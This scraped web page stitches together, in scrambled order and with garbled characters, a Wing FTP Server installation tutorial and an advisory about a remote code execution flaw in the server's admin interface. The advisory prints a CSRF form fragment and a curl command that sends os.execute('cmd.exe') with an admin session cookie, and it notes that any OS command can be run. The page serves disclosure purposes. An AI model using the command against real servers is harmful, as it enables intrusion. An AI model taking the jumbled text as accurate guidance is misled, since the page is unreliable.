![]() When user1(from other computer via an FTP client software) connects to the FTP server, he will see(in his ftp client program) the files in his home directory, and he can operate the files(such as delete ,move, copy, download,etc) via the ftp client. The Virtual Folder is shown "/", which is the directory a user can see in his ftp client software right after he connects to the FTP server. Click "Browse" to choose the directory D:\wftpserver\user1\ on your computer as the user's(user1's) home directory(Physical Path). Click "ok" and input the user name(user1)/password(user1). Input the domain name(domain1) and click "ok", you will be prompted to create a user account. Input the username and password you created in step 2 to log in.Ĥ. After installation, launch Wing FTP Server Administrator program(Figure). Wing FTP Server installation - add administrator accountģ. Input an Administrator Username and a password here. During installation, you will be asked to set up an administrator account which is used to log in the administrating program to manage Wing FTP server. ![]() Click WingFtpServer.exe to install Wing FTP Server on your computer. ![]() Download Wing FTP Server(We use a windows version here, you can find Linux and Solaris version on that website too).Ģ. How can you achieve that with Wing FTP Server?ġ. You want to store your to-be-shared files in D:\wftpserver\public\ that can be downloaded by others, and you create D:\wftpserver\user1\, D:\wftpserver\user2\., to be used by Wing FTP Server user1, user2., to upload/store their own files to. Suppose you create a directory D:\wftpserver\ on your computer that is to be managed by Wing FTP Server. Wing FTP Server can not only allow you to share files with others, but also allow others to upload their files to the computer where Wing FTP Server is installed. No fix for authenticated RCE at this time.If you want to store some files on a computer(so called server) to let others download them from other computers, you need a software called Wing FTP Server. Requests a week delay before public disclosure.ĬSRF attack vector fixed in version 4.4.7. Vulnerability confirmed and new version 4.4.7 released. Vendor requests clarification on impact and various attack scenarios. Vendor responds with requests for details of vulnerabilities. :5466/admin_lua_script.html" method="POST" enctype="text/plain">ġ) Either utilising the LUA Console interface directly and using the os.execute('') method.Ģ) POST directly using CURL with an authenticated cookie:Ĭurl -i -s -k -X 'POST' -b 'admin_lang=english UIDADMIN=b8b208e2239f462c11641eaa10cde7b0' -data-binary $'command=os.execute(\'cmd.exe\')'Īny OS command can be inserted into the os.execute('') method. The attack leverages the LUA CLI to inject commands at the same privilege as the web server. ![]() The RCE can be exploited in two scenarios, either by a CSRF attack (the admin interface is vulnerable to CSRF attacks) or by being authenticated to the admin interface. The admin interface of Wing FTP Server is vulnerable to a Remote Code Execution (RCE) vulnerability. You can also monitor server performance and online sessions and even receive email notifications about various events taking place on the server." And it provides admins with a web based interface to administrate the server from anywhere. It supports a number of file transfer protocols, including FTP, HTTP, FTPS, HTTPS and SFTP server, giving your end-users flexibility in how they connect to the server. "Wing FTP Server is an easy-to-use, secure and feature-rich enterprise FTP Server that can be used in Windows, Linux, Mac OSX and Solaris. Vulnerability Type: Improper Control of Generation of Code Vulnerable Versions: 4.4.6 and all previous versions ![]() Change Mirror Download Exploit Title: Wing FTP Server Remote Code Execution vulnerability ![]()
0 Comments
Leave a Reply. |
Details
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |